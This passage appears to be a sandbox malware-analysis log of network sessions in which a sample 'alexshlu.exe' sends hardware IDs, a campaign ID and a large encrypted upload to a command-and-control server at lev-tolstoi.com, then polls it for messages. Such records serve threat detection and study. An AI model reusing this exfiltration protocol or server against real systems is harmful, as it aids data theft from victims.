                                                                                                                                                                                                                                      2024-12-18 11:08:26 UTC15331OUTData Raw: 2d 2d 44 42 5a 4c 51 45 37 4f 4f 34 5a 48 4a 48 44 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 46 32 37 43 41 33 45 41 42 44 36 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 44 42 5a 4c 51 45 37 4f 4f 34 5a 48 4a 48 44 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 44 42 5a 4c 51 45 37 4f 4f 34 5a 48 4a 48 44 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 0d 0a 2d
                                                                                                                                                                                                                                      Data Ascii: --DBZLQE7OO4ZHJHDXContent-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--DBZLQE7OO4ZHJHDXContent-Disposition: form-data; name="pid"3--DBZLQE7OO4ZHJHDXContent-Disposition: form-data; name="lid"FATE99--november-
                                                                                                                                                                                                                                      2024-12-18 11:08:26 UTC4902OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 23 d1 61 a9 ef 87 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 3e 37 1c 1d 96 fa 7e 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 73 c3 c1 e7 62 c9 e0 95 58 f0 4a f0 ab c1 ff 36 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc e4 dd 93 3c 16 af 54 8b b3 c5 72 6e a6 5a 98 2a 94 a7 ae e5 a6 2a 8d 72 3d 31 9a 3c bc 29 a5 d6 98 ff 70 58 68 ff bb af ff fe e4 44 a2 4b 2d b9 ca 4c ae 76 b9 91 af 16 6a c9 bb 46 a2 8c 4b 7d 38 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 61 38 3a 2c f5 fd 30 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: s#a>7~sbXJ6<TrnZ**r=1<)pXhDK-LvjFK}8a8:,0
                                                                                                                                                                                                                                      2024-12-18 11:08:30 UTC1035INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=l5natqrdk8i5hd03egnjmdnga8; expires=Sun, 13-Apr-2025 04:55:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zXLVvY5ZxJLfyMqsPHWKiMdYp30TF%2BuJ0cDxddP6PB2p5OiIL12IUDEDGnupr2xi0YNKIludmruhrFBPCRLoAOLvqPVFiEoyibBvbqw090ZUPmXPMshETvCT6iHwTLDKC7Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb1e88cc47285-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1971&min_rtt=1969&rtt_var=744&sent=16&recv=25&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21192&delivery_rate=1466599&cwnd=249&unsent_bytes=0&cid=a788fc27a1aec6eb&ts=4376&x=0"
                                                                                                                                                                                                                                      2024-12-18 11:08:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2024-12-18 11:08:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      6192.168.2.849714172.67.157.2544437720C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 11:08:32 UTC271OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=XRK0RM6J3
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 1171
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 11:08:32 UTC1171OUTData Raw: 2d 2d 58 52 4b 30 52 4d 36 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 46 32 37 43 41 33 45 41 42 44 36 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 58 52 4b 30 52 4d 36 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 52 4b 30 52 4d 36 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 0d 0a 2d 2d 58 52 4b 30 52 4d 36 4a 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                      Data Ascii: --XRK0RM6J3Content-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--XRK0RM6J3Content-Disposition: form-data; name="pid"1--XRK0RM6J3Content-Disposition: form-data; name="lid"FATE99--november--XRK0RM6J3Content-D
                                                                                                                                                                                                                                      2024-12-18 11:08:32 UTC1043INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=makmbhvo3r6f6lt5tu8g5u6qq2; expires=Sun, 13-Apr-2025 04:55:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z2hXMQrl%2BxJLQ4gVr3HmXSW0eb%2FWWH%2BVK1lNeF%2FTHP%2BZTpJRovpZ2h%2B6I%2F3S54262UdEpBKpnD7Jd22KAv58r6KtzxlyYP6M98DoaBNr3i5ZFBm3AeOQ92spXPseWXfGkfc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb20e79ea427c-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2176&min_rtt=2173&rtt_var=822&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2078&delivery_rate=1326669&cwnd=245&unsent_bytes=0&cid=5da8744880e0acd1&ts=756&x=0"
                                                                                                                                                                                                                                      2024-12-18 11:08:32 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                      2024-12-18 11:08:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      7192.168.2.849715172.67.157.2544437720C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=2CZLVT98GDNSWI
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 582063
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: 2d 2d 32 43 5a 4c 56 54 39 38 47 44 4e 53 57 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 44 45 46 32 37 43 41 33 45 41 42 44 36 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 32 43 5a 4c 56 54 39 38 47 44 4e 53 57 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 43 5a 4c 56 54 39 38 47 44 4e 53 57 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 0d 0a 2d 2d 32 43 5a 4c 56
                                                                                                                                                                                                                                      Data Ascii: --2CZLVT98GDNSWIContent-Disposition: form-data; name="hwid"3DEF27CA3EABD68D23D904AF30EFEBBC--2CZLVT98GDNSWIContent-Disposition: form-data; name="pid"1--2CZLVT98GDNSWIContent-Disposition: form-data; name="lid"FATE99--november--2CZLV
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: 6c 92 63 81 3f 09 f5 c3 e9 87 22 fb ed bc 26 50 3f 02 fc b1 75 ab 87 59 08 54 7c b1 e5 b9 5d f2 df c6 34 1b 0b 2c a4 58 f3 2c d4 3f da 2c 02 11 1d 8a d2 60 91 22 a5 0b da 20 ce 68 ef 6e 6c ff 0e 96 f5 d3 4d 8f f4 30 f8 7c d6 99 d3 10 cb dc 37 30 9b fd 39 fd 6d 0b 8b 44 65 dd f5 1f 94 5a 97 f2 e4 c6 7f e6 56 de 5e 74 ad 95 c7 af 77 e1 c1 be 55 01 30 73 73 d8 fc 37 5d bf 68 4d 63 5d e7 07 6a 77 aa 5f bf f9 db d1 35 e7 a0 d4 87 de 3d df f5 5e 8b f0 e6 ba af fc df d1 c4 c0 df 47 13 33 06 31 f0 a3 65 87 41 37 88 66 d9 72 4c 87 42 77 d6 05 b1 64 47 17 76 e9 1e 6c f0 54 d1 bd 0a 00 6c df f0 cd 4c eb 5c 73 ff 3d 61 6f 8d 80 62 55 66 64 70 62 38 45 16 3d 97 38 81 74 07 cc de 75 25 8e 60 11 f4 f1 99 79 97 82 3d 22 29 fa 6e 14 b4 2d c7 96 73 73 af e6 19 a3 a8 12 64
                                                                                                                                                                                                                                      Data Ascii: lc?"&P?uYT|]4,X,?,`" hnlM0|709mDeZV^twU0ss7]hMc]jw_5=^G31eA7frLBwdGvlTlL\s=aobUfdpb8E=8tu%`y=")n-ssd
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: 6a 8d 65 a5 aa d0 d7 10 b4 5f 9a ec dc f0 46 6f 4c 4f 4f 68 ca a8 42 a4 96 dc 86 50 fa a8 0b ab b9 07 8e f4 8f 63 1f 5e cb f1 30 e6 8b 51 fc a0 ac ae f6 43 d2 ed 69 a4 ae 60 e2 bc 40 7b 16 10 a1 89 bc 94 15 80 86 45 fe 3c 95 e4 61 94 8a 96 8e 15 56 56 e9 c4 3a 99 d4 25 7b ab 8f 71 94 2c 3a d9 d3 41 74 92 a3 5a 8b 91 cd cc 33 c4 ba ee dc 7e b9 83 e8 61 ac 87 d5 b0 4d fc 72 f5 fe 4b 25 1f 52 2f fe f0 48 93 4d fd a9 3a 24 55 32 dd 4c 3f ea 41 77 f6 b8 32 75 a8 6a f1 90 ff 68 fc d1 0a 59 8f b2 da ed 95 2c 8a 37 c1 e8 88 66 44 98 c0 ef 79 9e 35 37 e5 9a ef 2f 65 1f 7c 4f 7f 6b a6 68 e0 b2 4b ea af 07 fa ec ab 47 47 46 b6 fa 79 21 b3 27 f3 46 1f 27 1c 5b 56 ef 64 9d 50 41 31 4e 23 cd 9c f9 58 e4 83 36 44 9d 70 9c 0f 6e 33 dc fa 29 c1 cf 11 04 f4 bf 70 fe f3 47
                                                                                                                                                                                                                                      Data Ascii: je_FoLOOhBPc^0QCi`@{E<aVV:%{q,:AtZ3~aMrK%R/HM:$U2L?Aw2ujhY,7fDy57/e|OkhKGGFy!'F'[VdPA1N#X6Dpn3)pG
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: ea 30 5b e1 40 f3 fa 9c 20 39 cd a1 a1 80 6c 27 d0 36 94 97 50 a5 72 bf 63 92 20 e3 7c d7 a3 5e 44 03 43 aa 17 21 f0 6f 06 6c 8c 9e fb c2 aa 0a 39 d9 17 ca 79 49 32 8f 51 71 48 62 3f db 33 74 fa 50 a1 ea 56 49 49 40 ef c8 66 aa ea 2e 9d 1b e7 d8 72 39 33 73 43 fa 3b 6e b1 a6 c3 42 1a 93 fb 33 8e 08 d0 ee b8 40 66 43 ba dc e4 35 3d 60 43 fa 68 7a 4d a2 fe 2d 68 56 10 5b 5e 0c 91 3e 2a d2 5f 21 e0 d4 83 13 d2 a8 69 3e 96 33 0f 50 41 85 32 0a f8 27 bf 47 d1 d9 02 40 17 89 82 40 8f e8 19 af 6d 88 ce 2b b9 7f 7b ac 66 2c 08 19 e2 fc 76 b9 06 60 a4 50 1e 92 18 46 e0 87 3c e6 85 93 8a c4 44 48 fc 9c f7 b8 08 0f 36 d8 e4 7e fa d9 48 df 2b e0 02 b1 b9 1d 54 a8 d6 88 e4 6b 8a 80 0e cc c7 42 44 a0 4f ad 51 8c 36 78 aa 8d 28 2e d8 85 ef dc 65 aa 96 ab b1 35 1d 47 e0
                                                                                                                                                                                                                                      Data Ascii: 0[@ 9l'6Prc |^DC!ol9yI2QqHb?3tPVII@f.r93sC;nB3@fC5=`ChzM-hV[^>*_!i>3PA2'G@@m+{f,v`PF<DH6~H+TkBDOQ6x(.e5G
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: 94 cb 05 6c 81 12 ac 73 28 5f f2 f2 1f 59 2e 5e d2 d9 63 91 16 ce 8b 0b 92 2d af 3c 1c 2a f3 1c 23 79 f4 2b ae cd 44 25 ed d6 7b e8 ea 07 70 50 8b f7 37 ed a7 59 da ec ad ad 4f f1 22 83 6e 5e 99 07 34 c3 08 83 32 b2 9e ae 8c 25 7d f0 de 64 54 62 da ee 5e 4b c7 13 79 8f a0 d3 43 4b 6e 86 b2 9b ef 94 a8 5c 50 1e a1 67 ba 5c 82 1c c6 f6 cb ed a8 13 ac f3 df d1 18 71 a0 9b 7f d7 8e 92 a1 95 37 df 7b b6 75 4d 0f 9c e0 7d 91 51 ba 27 f7 d0 c7 0a cf bb b6 4a 48 be e8 bc 63 d7 8b 00 f9 c5 30 09 b9 e6 8c 14 ba e4 36 a0 3e 96 59 64 49 d4 92 84 bb 0f ca ca e6 ef 07 7e a9 57 8c 6a 5e eb de 7b b3 93 ec a6 26 2d b4 d6 75 7f ff 51 97 d8 37 62 92 92 1d b8 50 ea d7 d2 be c5 ca 9b ce fb 3f ba b5 f3 21 bc f9 c1 db 37 bc d3 96 f1 12 92 d3 18 dc 93 ff cd f5 03 e7 65 be a8 a6
                                                                                                                                                                                                                                      Data Ascii: ls(_Y.^c-<*#y+D%{pP7YO"n^42%}dTb^KyCKn\Pg\q7{uM}Q'JHc06>YdI~Wj^{&-uQ7bP?!7e
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: 6d cf d0 42 a5 d2 c4 5e e7 f0 d3 6b 8f 7b ef 6a 0e 4e 58 2e 9c b7 71 a8 c8 be fa f6 da 7a 97 08 48 dc 0e e0 ea bb 7b 76 7b a6 db e4 39 40 48 89 5d bf 53 34 3e ff 26 32 cc 1f d7 f1 77 a3 e3 81 95 90 82 2c f3 af 2a e1 e1 c9 88 f0 a8 70 9f 89 3b 07 8b 56 78 c7 be 89 61 46 64 a9 0a 58 6a d9 08 82 7b cb a1 ed 66 65 63 35 6c cd f0 1c 39 d7 eb 20 c5 f3 3f 2b a4 49 1f c8 fe eb 15 74 74 36 90 a3 59 a3 89 cd 7c 20 fe 1c b1 59 04 78 6c c9 57 93 67 10 41 df 46 6f ec d6 a7 1a 6f 4b 1f df 2f c4 41 a0 3f 52 8a f8 f2 90 c6 cc 97 6c 1f 8a c5 1d 63 a7 a3 c5 ec 5b cf 70 6c 5d a7 b0 32 c8 7a d7 5a b6 17 d6 0f fa 49 06 55 34 2a 39 55 bc 36 26 a9 bc a9 09 0e 10 5d eb 33 4c 8c 23 30 86 e5 a8 fd 33 1b 8d 5b ae 10 34 fc 68 26 f9 e5 13 0e 6e dd 1f aa 79 bb 5b 5b 62 a4 ed f4 dc 44
                                                                                                                                                                                                                                      Data Ascii: mB^k{jNX.qzH{v{9@H]S4>&2w,*p;VxaFdXj{fec5l9 ?+Itt6Y| YxlWgAFooK/A?Rlc[pl]2zZIU4*9U6&]3L#03[4h&ny[[bD
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: 8d 4f 07 9d 2f 62 45 21 1c 13 72 01 e4 1d a1 26 e2 2d fb 3e da 71 33 45 a1 f7 0f a5 a8 51 e0 91 35 1f 64 3a f5 b9 94 56 93 2c 51 96 ea d7 47 eb cd d5 1d c2 a5 85 cb ae 50 52 60 1a e5 ea 3e eb 57 89 61 29 7c 6e e3 24 4f ae 0f 32 85 0f 7f 1c 38 b6 aa 79 75 bc ca fd c1 65 94 03 61 b7 74 1a 74 ea c1 b7 0c b8 a2 72 0d 19 b9 b8 23 8e dc d2 b5 8d 28 a0 0e d9 5f 57 00 fd f5 24 5b 90 9c e2 92 94 68 34 c4 7d c9 db f0 c8 e2 e1 59 2b 6c 8a 8f dc 5d 1f b6 2d 30 41 e6 9c c0 0c a9 e6 e1 35 12 84 0b f8 51 96 93 4d 46 0f d3 8c eb 52 e8 49 cf 1c 4d b0 6a d0 a2 8e 4e c5 9c ab ce c0 b4 c1 10 5a d7 b9 ac 92 69 f1 96 dc 2b 9c 43 4d f4 76 52 a3 17 0a 1a 2f 20 af 81 9c 65 e3 76 a1 db 95 b1 0d 26 50 13 60 1c 1d 24 be 08 99 fe 46 25 35 85 2f 49 cb 85 f9 32 6f 98 65 26 88 35 7e 97
                                                                                                                                                                                                                                      Data Ascii: O/bE!r&->q3EQ5d:V,QGPR`>Wa)|n$O28yueattr#(_W$[h4}Y+l]-0A5QMFRIMjNZi+CMvR/ ev&P`$F%5/I2oe&5~
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: a5 73 92 37 a1 0c a0 24 64 ea be e6 05 ad 74 aa 3e 3e 85 c8 cc d2 4d b8 4b fe 58 bf f8 42 c0 45 f1 7a e2 7e 22 78 b2 fc e9 c1 f5 0b 94 7d 18 06 9d 5e 90 b5 d4 d0 3d ae d6 9b b4 fe 66 da ee 6c 94 57 05 62 7e 89 fe cb d2 d7 c9 bb 57 30 f9 93 35 e7 58 22 65 3c ec 1f 82 b2 de 72 56 62 76 a8 0d 92 0d e6 c1 c6 69 78 fe 45 7d 23 a0 59 06 46 d3 f5 f9 dd d5 8e 71 b4 28 6f 5c 39 61 8d ed b5 bf b4 ea fe c7 52 cb ad dd 1c 26 79 b7 bf 1e 52 fd 3b d4 a4 4c b1 29 f9 51 25 7b 8e 9c 95 fc be 86 dc 1d c2 ce 69 5e e2 4d 31 6a 47 0c ef 0c f7 ab ca 92 6d 3d 9b 04 1b 97 66 69 85 3c 7a 75 5e c3 81 1a 52 79 e3 fe 17 43 8f 5b ca 52 a0 c6 7f 99 cb a3 5a 0f ef 12 af 13 0f 80 7c 75 aa e7 3d cb cb 1a 97 e2 6b 8f a6 97 bf 20 22 73 38 c6 ec 00 df 5d 1a 37 35 eb e7 0c 7a 92 5b c2 8c a9
                                                                                                                                                                                                                                      Data Ascii: s7$dt>>MKXBEz~"x}^=flWb~W05X"e<rVbvixE}#YFq(o\9aR&yR;L)Q%{i^M1jGm=fi<zu^RyC[RZ|u=k "s8]75z[
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: 09 5b 28 a7 08 02 8d ac bc 65 db 91 c8 41 b6 97 07 5c c9 e4 64 7e 2b 92 c8 67 87 25 d9 9d 30 2b 53 e4 06 78 9d 42 c9 75 6a 4b 9d 68 cd 21 0a 2f d2 fe b5 c2 20 ac f0 14 f5 e2 ae ee 73 66 fc 94 2b 1a 9b 26 44 80 e1 d1 c0 2e 0a e7 5e 7f 59 76 c3 26 d2 67 84 fc f1 e4 87 78 98 69 82 2f 61 24 7e 8a a8 52 85 78 b9 27 b5 cb 19 86 37 c3 ab 43 5d 9e 1a 27 08 92 7b a6 5c ea e2 b5 38 3d 8a 6d 36 9a 99 14 37 db 00 96 30 10 d9 30 05 11 7a 15 ea b0 23 8b f5 17 a4 b7 e2 e6 31 ad 83 8c 60 14 e0 52 13 9d c1 82 07 ae 97 41 a3 76 3b ea 55 c0 cf ec 0a 96 08 38 ca f0 b2 ec cb d1 01 dd 3c 36 2a 09 53 a3 0f e1 69 a7 1a 28 14 44 68 d2 9a 59 c0 a6 f0 e6 ac 1a c1 c9 1d d3 80 bb 52 c3 b7 4d 3a a5 d2 16 44 8c 8b ba 93 f5 8d af fd 0b b7 da 73 c3 81 f8 e8 71 d8 55 61 d4 cb ba 80 59 e1
                                                                                                                                                                                                                                      Data Ascii: [(eA\d~+g%0+SxBujKh!/ sf+&D.^Yv&gxi/a$~Rx'7C]'{\8=m6700z#1`RAv;U8<6*Si(DhYRM:DsqUaY
                                                                                                                                                                                                                                      2024-12-18 11:08:34 UTC15331OUTData Raw: 9c 73 d2 69 da 64 85 a1 65 55 e9 91 70 d9 fe f0 0e b1 fc 03 1e 96 a6 e7 45 47 4b 8c 91 1b 95 7a 65 4e 5e 83 9d 54 ab 6f 80 5f 91 5d ea ae d2 1b d0 a8 c3 2c bf 61 86 16 bf 1d 4d 99 92 53 f8 0f 84 8d 4c 4f a5 73 06 f8 81 b3 ef 9c 8c 42 ef 63 60 3d fe e3 ca 19 9b 4a 1f e7 b9 57 01 9c 25 1d c3 d0 25 59 04 aa 6f f9 73 a4 28 ed e7 f9 52 c5 a1 be ea 13 c6 2b 0c bf 47 16 cc ce 5f be 41 90 d9 b8 28 03 87 90 be 31 4b 5a c9 27 99 2f f8 94 b2 87 bc fb 1f f0 57 0e e2 d0 a1 a1 36 7d 31 4d 5b 01 08 38 8d 86 2d f8 52 e9 f0 ec cc 60 c5 8a 8b db e8 80 fb 9d 8d b1 55 2b ac ed 4a 20 02 cb 3e 7d 03 d2 e1 44 74 a1 ab 4c 35 91 ab 02 59 d3 97 e4 e4 a3 cb c4 09 d4 cd 2d 01 3c 10 5c ca b9 a9 05 74 1c 0c 53 1f 83 7f 27 b1 db 6c e9 32 51 50 27 74 bb a9 82 c0 e8 d7 5d e2 02 e0 70 f9
                                                                                                                                                                                                                                      Data Ascii: sideUpEGKzeN^To_],aMSLOsBc`=JW%%Yos(R+G_A(1KZ'/W6}1M[8-R`U+J >}DtL5Y-<\tS'l2QP't]p
                                                                                                                                                                                                                                      2024-12-18 11:08:39 UTC1042INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:39 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=9ti2nhd1sh1pc87k2a6000hq58; expires=Sun, 13-Apr-2025 04:55:16 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2uhY7KoS4waAzTdr6XzYgxGZJuXaWWRz6tBQRCeo22rsbDEEl17bcopdooqxkIMHpNwZQvs3G%2FRg4m78DfvagKVEmyit1vXqmxWgXYtcDTEgdj9b%2BqvJ0R%2BjgdNBwSIG9z4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 8f3eb21e2cea7cea-EWR
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1940&rtt_var=743&sent=367&recv=611&lost=0&retrans=0&sent_bytes=2834&recv_bytes=584627&delivery_rate=1457813&cwnd=226&unsent_bytes=0&cid=cda6a2ce585dae91&ts=4688&x=0"


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      8192.168.2.849716172.67.157.2544437720C:\Users\user\Desktop\alexshlu.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-12-18 11:08:40 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Content-Length: 85
                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                      2024-12-18 11:08:40 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 6e 6f 76 65 6d 62 65 72 26 6a 3d 26 68 77 69 64 3d 33 44 45 46 32 37 43 41 33 45 41 42 44 36 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                                                                                                                                                                                      Data Ascii: act=get_message&ver=4.0&lid=FATE99--november&j=&hwid=3DEF27CA3EABD68D23D904AF30EFEBBC
                                                                                                                                                                                                                                      2024-12-18 11:08:41 UTC1043INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Wed, 18 Dec 2024 11:08:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
